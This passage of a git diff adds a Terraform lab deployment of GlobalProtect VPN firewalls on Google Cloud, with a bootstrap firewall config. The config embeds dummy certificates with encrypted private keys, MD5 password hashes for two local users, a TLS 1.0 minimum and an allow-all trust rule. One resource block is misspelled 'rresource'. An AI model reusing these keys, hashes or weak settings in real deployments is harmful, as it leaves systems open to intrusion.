3OYa1V4AfVblrdzcfJerQLorR44CkTvgF5Et5ESKd8+kV2dAnP40R3fmNkmd9n9BkAE+m5yz1SS1msZu7hdx9dE5huRt5e00Fhx18EJbUqzNI+xY09ka99NrLZ48ECAKU4yUCVLwNTmoWGjaK+giz6XlCkkWIT0WzbTxsUdotP+wX5LsGIfyT/mJtIM+co3/Qeip1vRT9cMl/OL6dFqBduvLKTjhQO7P6ogwRungHOGSYNZRhsM9P2FCmwI2czfS9hQMNy3J5dkLSyJUG+/4ldVf1qDlkExCWS</private-key>
+      </entry>
+      <entry name="dummy-portal-cert">
+        <subject-hash>a505da21</subject-hash>
+        <issuer-hash>e8d8421e</issuer-hash>
+        <not-valid-before>Mar 25 14:04:43 2020 GMT</not-valid-before>
+        <issuer>/CN=GP-CA</issuer>
+        <not-valid-after>Mar 25 14:04:43 2021 GMT</not-valid-after>
+        <common-name>dummy-portal-cert</common-name>
+        <expiry-epoch>1616681083</expiry-epoch>
+        <ca>no</ca>
+        <subject>/CN=dummy-portal-cert</subject>
+        <public-key>-----BEGIN CERTIFICATE-----
+MIIDFzCCAf+gAwIBAgIEa51q2zANBgkqhkiG9w0BAQsFADAQMQ4wDAYDVQQDEwVH
+UC1DQTAeFw0yMDAzMjUxNDA0NDNaFw0yMTAzMjUxNDA0NDNaMBwxGjAYBgNVBAMT
+EWR1bW15LXBvcnRhbC1jZXJ0MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC
+AQEA2lQTCdFX9ipNB5vNvsr1StRKySrYXfAFp2zd4+n6d7SbauoIYgJ4H3TNqMjC
+g0LqWj4ZIueD32DfLRGg1E+I+wlOMjHorT9WWl/s9rHnzWZcLiXB9+//dwOnOb7D
+cmTKAEsyKMKuvAlcLZE/+2o0cBAEMZiOFseAnN//tOOBfw4ps/mdeGVnkdUxcDNw
+qt7zuLewAuoWWYNG89kDK+yl+osk8HwVWb2h1hzX4ru3eA6Eu/Mi7LjVKmjA7rkf
+Uuznxd+WXsXVzOXhZ+zcTjiWganOw68/indTlEnlr4AjDp2fjh0KHvN1RS+9LpG1
+q3/j6nG43rjqTgw4ck+B5oxdywIDAQABo20wazAJBgNVHRMEAjAAMAsGA1UdDwQE
+AwIDuDAnBgNVHSUEIDAeBggrBgEFBQcDAQYIKwYBBQUHAwIGCCsGAQUFBwMFMAkG
+A1UdIwQCMAAwHQYDVR0OBBYEFMWfabSY9YsC5BxBsrW4YO25OhynMA0GCSqGSIb3
+DQEBCwUAA4IBAQARAtUAkncs7l+DEkRXI6eH0h5eQmwV51fNtTL1ZoXgol8RPQXS
+MbfFmNZXlkDvC3cTeSuUABC6XYuK/YtTPR91H+c5JxZpDviPsZCRfPPVdXG3qO9+
+RDXMcCHQszSwiEfSnv031L0RKKhbxYBxhLQH+Rtj98gsRIBNvFDxcwxxesyjwXxd
+Dn94Ai0XjpfRXUN8A3kpLm3w4D8Thly7Rbm48teG7iLTnp8cqIeXLTUoFVOy8q8i
+mF0yAHinKlZowbAFo9u2OABVzRjWDcE9z0fUn8Nv1nrG8ROLlhGb3/S7wZYB6BZl
++wPtFwy/ddXpFb2dtfGk87+tbHiIk5jf2jCY
+-----END CERTIFICATE-----
+</public-key>
+        <algorithm>RSA</algorithm>
+        <private-key>-AQ==/DO+X7/5/0zLt2M6gBYgg8Ayu4g=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</private-key>
+      </entry>
+      <entry name="dummy-gw-cert">
+        <subject-hash>a0cb01b7</subject-hash>
+        <issuer-hash>e8d8421e</issuer-hash>
+        <not-valid-before>Mar 25 14:05:09 2020 GMT</not-valid-before>
+        <issuer>/CN=GP-CA</issuer>
+        <not-valid-after>Mar 25 14:05:09 2021 GMT</not-valid-after>
+        <common-name>dummy-gw-cert</common-name>
+        <expiry-epoch>1616681109</expiry-epoch>
+        <ca>no</ca>
+        <subject>/CN=dummy-gw-cert</subject>
+        <public-key>-----BEGIN CERTIFICATE-----
+MIIDEzCCAfugAwIBAgIEa51q3DANBgkqhkiG9w0BAQsFADAQMQ4wDAYDVQQDEwVH
+UC1DQTAeFw0yMDAzMjUxNDA1MDlaFw0yMTAzMjUxNDA1MDlaMBgxFjAUBgNVBAMT
+DWR1bW15LWd3LWNlcnQwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQC7
+5By6OdRX2G2leyF+aVtOXZGKlCR0RUPPQckzIxTOs8duBwPJmXPGLpeh13tVJtEv
+09bOpjHGOqJFfm/CO0R0NIxyMF4IurTIbw7eGGP/jg/SMXVi/XNTy2TRGteVJUch
+jzxPpZiIxJmo5fzI7aKcxUXobuO+495u6tsHxYevmpg28RacK74GMqoGTC8+E1d2
+fXd0qMQyseuJsU6zEWOqwjEsC0Gqhwbq4byhdQbJW2juaSD1piv89Ed75MH7btUR
+DJKHRnhNMcvpDnoH3IlQynRtLHUQjxlXUBRWlrCCjUOd0a/XWNgjT69iDa6K0V4s
+WkH9QIaOGotafVZShYU/AgMBAAGjbTBrMAkGA1UdEwQCMAAwCwYDVR0PBAQDAgO4
+MCcGA1UdJQQgMB4GCCsGAQUFBwMBBggrBgEFBQcDAgYIKwYBBQUHAwUwCQYDVR0j
+BAIwADAdBgNVHQ4EFgQUzD9VvicyV2Bx4njYSjUHMYPqGe4wDQYJKoZIhvcNAQEL
+BQADggEBAAwXTc9lMGZurI7j7BmxF5vNdRf86rwSJK70S/WMm7BHfFo4eRdqoa+J
+Q90nm89osWMT3aXKriZ+ge7iq5jtu5r4vOPKelEbEa6vuXg2eaHpL23HBUxeTkNI
+DxfYhMogoKFoiX9/zRBy+8lWz4b2IquAcjWFA4GWPfX+JtAUDpwAQFyIBxU0x4wy
+hy8kLsAh+tuZfWgTFrYBS0tiV62Amtcl3/+G/zyoQ2orKtTHPBTaHOG3d3zLsQJ3
+c+PZn6KlSWAf2VthbbPnn1hvMxU+c7w2lWQX64FSzLt4LQSol7qnyLROgFKTKVXG
+EB826Ks5mv+qxogo1C6hLvdpiHUp+ys=
+-----END CERTIFICATE-----
+</public-key>
+        <algorithm>RSA</algorithm>
+        <private-key>-AQ==B+uxEDleVDIXpf2wVEueVGEMvc4=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</private-key>
+      </entry>
+    </certificate>
+    <ssl-tls-service-profile>
+      <entry name="portal-ssl-tls">
+        <protocol-settings>
+          <min-version>tls1-0</min-version>
+          <max-version>max</max-version>
+        </protocol-settings>
+        <certificate>dummy-portal-cert</certificate>
+      </entry>
+    </ssl-tls-service-profile>
+    <authentication-profile>
+      <entry name="local">
+        <method>
+          <local-database/>
+        </method>
+        <allow-list>
+          <member>all</member>
+        </allow-list>
+      </entry>
+    </authentication-profile>
+    <local-user-database>
+      <user>
+        <entry name="gp-user1">
+          <phash>$1$kobgpbqd$tCeUrtyaJNKirLxMwLs/o1</phash>
+        </entry>
+        <entry name="gp-user2">
+          <phash>$1$xgwfehpw$rdQRIHTfNVtUZIdeunXHG1</phash>
+        </entry>
+      </user>
+    </local-user-database>
+    <content-preview>
+      <application/>
+      <application-type>
+        <category/>
+        <technology/>
+      </application-type>
+    </content-preview>
+    <application/>
+    <application-group/>
+    <service/>
+    <service-group/>
+    <botnet>
+      <configuration>
+        <http>
+          <dynamic-dns>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </dynamic-dns>
+          <malware-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </malware-sites>
+          <recent-domains>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </recent-domains>
+          <ip-domains>
+            <enabled>yes</enabled>
+            <threshold>10</threshold>
+          </ip-domains>
+          <executables-from-unknown-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </executables-from-unknown-sites>
+        </http>
+        <other-applications>
+          <irc>yes</irc>
+        </other-applications>
+        <unknown-applications>
+          <unknown-tcp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-tcp>
+          <unknown-udp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-udp>
+        </unknown-applications>
+      </configuration>
+      <report>
+        <topn>100</topn>
+        <scheduled>yes</scheduled>
+      </report>
+    </botnet>
+    <log-settings>
+      <profiles>
+        <entry name="default">
+          <match-list>
+            <entry name="Traffic_Log_Forwarding">
+              <log-type>traffic</log-type>
+              <filter>All Logs</filter>
+              <send-to-panorama>yes</send-to-panorama>
+            </entry>
+            <entry name="Threat_Log_Forwarding">
+              <log-type>threat</log-type>
+              <filter>All Logs</filter>
+              <send-to-panorama>yes</send-to-panorama>
+            </entry>
+            <entry name="Wildfire_Log_Forwarding">
+              <log-type>wildfire</log-type>
+              <filter>All Logs</filter>
+              <send-to-panorama>yes</send-to-panorama>
+            </entry>
+            <entry name="URL_Log_Forwarding">
+              <log-type>url</log-type>
+              <filter>All Logs</filter>
+              <send-to-panorama>yes</send-to-panorama>
+            </entry>
+            <entry name="Data_Log_Forwarding">
+              <log-type>data</log-type>
+              <filter>All Logs</filter>
+              <send-to-panorama>yes</send-to-panorama>
+            </entry>
+            <entry name="Tunnel_Log_Forwarding">
+              <log-type>tunnel</log-type>
+              <filter>All Logs</filter>
+              <send-to-panorama>yes</send-to-panorama>
+            </entry>
+            <entry name="Auth_Log_Forwarding">
+              <log-type>auth</log-type>
+              <filter>All Logs</filter>
+              <send-to-panorama>yes</send-to-panorama>
+            </entry>
+          </match-list>
+        </entry>
+      </profiles>
+    </log-settings>
+  </shared>
+</config>
diff --git a/gcp/GP-NoAutoScaling/bootstrap-portal/init-cfg.txt b/gcp/GP-NoAutoScaling/bootstrap-portal/init-cfg.txt
new file mode 100644
index 00000000..3606b11c
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/bootstrap-portal/init-cfg.txt
@@ -0,0 +1,14 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+hostname=FW-1
+dns-primary=
+dns-secondary=
+op-command-modes=mgmt-interface-swap
+dhcp-send-hostname=yes
+dhcp-send-client-id=yes
+dhcp-accept-server-hostname=yes
+dhcp-accept-server-domain=yes
diff --git a/gcp/GP-NoAutoScaling/bootstrap-portal/null.txt b/gcp/GP-NoAutoScaling/bootstrap-portal/null.txt
new file mode 100644
index 00000000..8b137891
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/bootstrap-portal/null.txt
@@ -0,0 +1 @@
+
diff --git a/gcp/GP-NoAutoScaling/gateways.tf b/gcp/GP-NoAutoScaling/gateways.tf
new file mode 100644
index 00000000..eb72ede5
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/gateways.tf
@@ -0,0 +1,121 @@
+resource "google_compute_address" "gp_gateway1_management" {
+  name   = "gp-gateway1-management"
+  project = google_project.globalprotect.number
+  region  = var.GCP_Region
+}
+
+resource "google_compute_address" "gp_gateway1_untrust" {
+  name   = "gp-gateway1-untrust"
+  project = google_project.globalprotect.number
+  region  = var.GCP_Region
+}
+
+resource "google_compute_instance" "gateway1" {
+  project                   = google_project.globalprotect.number
+  name                      = "gp-gateway1"
+  machine_type              = var.FW_Machine_Type
+  zone                      = data.google_compute_zones.available.names[0]
+  can_ip_forward            = true
+  allow_stopping_for_update = true
+  metadata = {
+    vmseries-bootstrap-gce-storagebucket = google_storage_bucket.gateway_bucket.name
+    serial-port-enable      = true
+    ssh-keys                 = fileexists(var.Public_Key_Path) ? "admin:${file(var.Public_Key_Path)}" : ""
+  }
+  
+  service_account {
+    scopes = [
+      "https://www.googleapis.com/auth/compute.readonly",
+      "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+      "https://www.googleapis.com/auth/devstorage.read_only",
+      "https://www.googleapis.com/auth/logging.write",
+      "https://www.googleapis.com/auth/monitoring.write",
+    ]
+  }
+  
+  network_interface {
+    subnetwork    = google_compute_subnetwork.untrust_subnet.self_link
+    access_config {
+      nat_ip = google_compute_address.gp_gateway1_untrust.address
+    }
+  }
+
+  network_interface {
+    subnetwork    = google_compute_subnetwork.management_subnet.self_link
+    access_config {
+      nat_ip = google_compute_address.gp_gateway1_management.address
+    }
+  }
+
+  network_interface {
+    subnetwork = google_compute_subnetwork.trust_subnet.self_link
+  }
+
+  boot_disk {
+    initialize_params {
+      image = "${var.FW_Image}-${var.FW_PanOS}"
+      type  = "pd-ssd"
+    }
+  }
+}
+
+resource "google_compute_address" "gp_gateway2_management" {
+  name   = "gp-gateway2-management"
+  project = google_project.globalprotect.number
+  region  = var.GCP_Region
+}
+
+resource "google_compute_address" "gp_gateway2_untrust" {
+  name   = "gp-gateway2-untrust"
+  project = google_project.globalprotect.number
+  region  = var.GCP_Region
+}
+
+resource "google_compute_instance" "gateway2" {
+  project                   = google_project.globalprotect.number
+  name                      = "gp-gateway2"
+  machine_type              = var.FW_Machine_Type
+  zone                      = data.google_compute_zones.available.names[1]
+  can_ip_forward            = true
+  allow_stopping_for_update = true
+  metadata = {
+    vmseries-bootstrap-gce-storagebucket = google_storage_bucket.gateway_bucket.name
+    serial-port-enable      = true
+    ssh-keys                 = fileexists(var.Public_Key_Path) ? "admin:${file(var.Public_Key_Path)}" : ""
+  }
+  
+  service_account {
+    scopes = [
+      "https://www.googleapis.com/auth/compute.readonly",
+      "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+      "https://www.googleapis.com/auth/devstorage.read_only",
+      "https://www.googleapis.com/auth/logging.write",
+      "https://www.googleapis.com/auth/monitoring.write",
+    ]
+  }
+  
+  network_interface {
+    subnetwork    = google_compute_subnetwork.untrust_subnet.self_link
+    access_config {
+      nat_ip = google_compute_address.gp_gateway2_untrust.address
+    }
+  }
+
+  network_interface {
+    subnetwork    = google_compute_subnetwork.management_subnet.self_link
+    access_config {
+      nat_ip = google_compute_address.gp_gateway2_management.address
+    }
+  }
+
+  network_interface {
+    subnetwork = google_compute_subnetwork.trust_subnet.self_link
+  }
+
+  boot_disk {
+    initialize_params {
+      image = "${var.FW_Image}-${var.FW_PanOS}"
+      type  = "pd-ssd"
+    }
+  }
+}
\ No newline at end of file
diff --git a/gcp/GP-NoAutoScaling/gcp_firewall.tf b/gcp/GP-NoAutoScaling/gcp_firewall.tf
new file mode 100644
index 00000000..afa4bc13
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/gcp_firewall.tf
@@ -0,0 +1,33 @@
+resource "google_compute_firewall" "management" {
+  name    = "management-firewall"
+  project = google_project.globalprotect.number
+  network = google_compute_network.management_network.name
+  allow {
+    protocol = "tcp"
+    ports    = ["22", "443"]
+  }
+}
+resource "google_compute_firewall" "untrust" {
+  name    = "untrust-firewall"
+  project = google_project.globalprotect.number
+  network = google_compute_network.untrust_network.name
+  allow {
+    protocol = "tcp"
+    ports    = ["443"]
+  }
+  allow {
+    protocol = "udp"
+    ports    = ["500","4500","4501"]
+  }
+  allow {
+    protocol = "esp"
+  }
+}
+resource "google_compute_firewall" "trust" {
+  name    = "trust-firewall"
+  project = google_project.globalprotect.number
+  network = google_compute_network.trust_network.name
+  allow {
+    protocol = "all"
+  }
+}
\ No newline at end of file
diff --git a/gcp/GP-NoAutoScaling/images/GP_in_GCP.png b/gcp/GP-NoAutoScaling/images/GP_in_GCP.png
new file mode 100644
index 00000000..989ebab3
Binary files /dev/null and b/gcp/GP-NoAutoScaling/images/GP_in_GCP.png differ
diff --git a/gcp/GP-NoAutoScaling/main.tf b/gcp/GP-NoAutoScaling/main.tf
new file mode 100644
index 00000000..c6940ef9
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/main.tf
@@ -0,0 +1,3 @@
+provider "google" {}
+
+provider "random" {}
\ No newline at end of file
diff --git a/gcp/GP-NoAutoScaling/output.tf b/gcp/GP-NoAutoScaling/output.tf
new file mode 100644
index 00000000..754d45d4
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/output.tf
@@ -0,0 +1,11 @@
+output "Portal-Management-IP" {
+  value = "${google_compute_instance.portal.network_interface.1.access_config.0.nat_ip}"
+}
+
+output "Gateway1-Management-IP" {
+  value = "${google_compute_instance.gateway1.network_interface.1.access_config.0.nat_ip}"
+}
+
+output "Gateway2-Management-IP" {
+  value = "${google_compute_instance.gateway2.network_interface.1.access_config.0.nat_ip}"
+}
\ No newline at end of file
diff --git a/gcp/GP-NoAutoScaling/portal.tf b/gcp/GP-NoAutoScaling/portal.tf
new file mode 100644
index 00000000..dfed3411
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/portal.tf
@@ -0,0 +1,56 @@
+resource "google_compute_address" "gp_portal_management" {
+  name   = "gp-portal-management"
+  project = google_project.globalprotect.number
+  region  = var.GCP_Region
+}
+
+resource "google_compute_address" "gp_portal_untrust" {
+  name   = "gp-portal-untrust"
+  project = google_project.globalprotect.number
+  region  = var.GCP_Region
+}
+
+resource "google_compute_instance" "portal" {
+  project                   = google_project.globalprotect.number
+  name                      = "gp-portal"
+  machine_type              = var.FW_Machine_Type
+  zone                      = data.google_compute_zones.available.names[0]
+  can_ip_forward            = false
+  allow_stopping_for_update = true
+  metadata = {
+    vmseries-bootstrap-gce-storagebucket = google_storage_bucket.portal_bucket.name
+    serial-port-enable      = true
+    ssh-keys                = fileexists(var.Public_Key_Path) ? "admin:${file(var.Public_Key_Path)}" : ""
+  }
+  
+  service_account {
+    scopes = [
+      "https://www.googleapis.com/auth/compute.readonly",
+      "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+      "https://www.googleapis.com/auth/devstorage.read_only",
+      "https://www.googleapis.com/auth/logging.write",
+      "https://www.googleapis.com/auth/monitoring.write",
+    ]
+  }
+  
+  network_interface {
+    subnetwork    = google_compute_subnetwork.untrust_subnet.self_link
+    access_config {
+      nat_ip = google_compute_address.gp_portal_untrust.address
+    }
+  }
+
+  network_interface {
+    subnetwork    = google_compute_subnetwork.management_subnet.self_link
+    access_config {
+      nat_ip = google_compute_address.gp_portal_management.address
+    }
+  }
+
+  boot_disk {
+    initialize_params {
+      image = "${var.FW_Image}-${var.FW_PanOS}"
+      type  = "pd-ssd"
+    }
+  }
+}
diff --git a/gcp/GP-NoAutoScaling/project.tf b/gcp/GP-NoAutoScaling/project.tf
new file mode 100644
index 00000000..e44a7ff4
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/project.tf
@@ -0,0 +1,19 @@
+resource "random_id" "random_number" {
+  byte_length = 2
+}
+resource "google_project" "globalprotect" {
+  name                = "${var.Base_Project_Name}-${random_id.random_number.hex}"
+  project_id          = "${var.Base_Project_Name}-${random_id.random_number.hex}"
+  billing_account     = var.Billing_Account
+  auto_create_network = false
+}
+resource "google_project_service" "globalprotect" {
+  project                    = google_project.globalprotect.number
+  service                    = "storage-api.googleapis.com"
+  disable_dependent_services = true
+}
+
+data "google_compute_zones" "available" {
+  project = google_project.globalprotect.project_id
+  region  = var.GCP_Region
+}
\ No newline at end of file
diff --git a/gcp/GP-NoAutoScaling/servers.tf b/gcp/GP-NoAutoScaling/servers.tf
new file mode 100644
index 00000000..f503ff40
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/servers.tf
@@ -0,0 +1,77 @@
+resource "google_compute_instance" "server1" {
+  name         = "server1"
+  project      = google_project.globalprotect.number
+  zone         = data.google_compute_zones.available.names[0]
+  machine_type = "n1-standard-1"
+  allow_stopping_for_update = true
+  timeouts = {
+    create = "15m"
+    delete = "60m"
+  }
+
+  metadata = {
+    vmseries-bootstrap-gce-storagebucket = google_storage_bucket.portal_bucket.name
+    serial-port-enable      = true
+    ssh-keys                = fileexists(var.Public_Key_Path) ? "admin:${file(var.Public_Key_Path)}" : ""
+  }
+
+  service_account {
+    scopes = [
+      "https://www.googleapis.com/auth/compute.readonly",
+      "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+      "https://www.googleapis.com/auth/devstorage.read_only",
+      "https://www.googleapis.com/auth/logging.write",
+      "https://www.googleapis.com/auth/monitoring.write",
+    ]
+  }
+
+  boot_disk {
+    initialize_params {
+      image = "ubuntu-os-cloud/ubuntu-1604-lts"
+    }
+  }
+
+  network_interface {
+    subnetwork    = google_compute_subnetwork.management_subnet.self_link
+    access_config {}
+  }
+}
+
+rresource "google_compute_instance" "server2" {
+  name         = "server2"
+  project      = google_project.globalprotect.number
+  zone         = data.google_compute_zones.available.names[1]
+  machine_type = "n1-standard-1"
+  allow_stopping_for_update = true
+  timeouts = {
+    create = "15m"
+    delete = "60m"
+  }
+
+  metadata = {
+    vmseries-bootstrap-gce-storagebucket = google_storage_bucket.portal_bucket.name
+    serial-port-enable      = true
+    ssh-keys                = fileexists(var.Public_Key_Path) ? "admin:${file(var.Public_Key_Path)}" : ""
+  }
+
+  service_account {
+    scopes = [
+      "https://www.googleapis.com/auth/compute.readonly",
+      "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+      "https://www.googleapis.com/auth/devstorage.read_only",
+      "https://www.googleapis.com/auth/logging.write",
+      "https://www.googleapis.com/auth/monitoring.write",
+    ]
+  }
+
+  boot_disk {
+    initialize_params {
+      image = "ubuntu-os-cloud/ubuntu-1604-lts"
+    }
+  }
+
+  network_interface {
+    subnetwork    = google_compute_subnetwork.management_subnet.self_link
+    access_config {}
+  }
+}
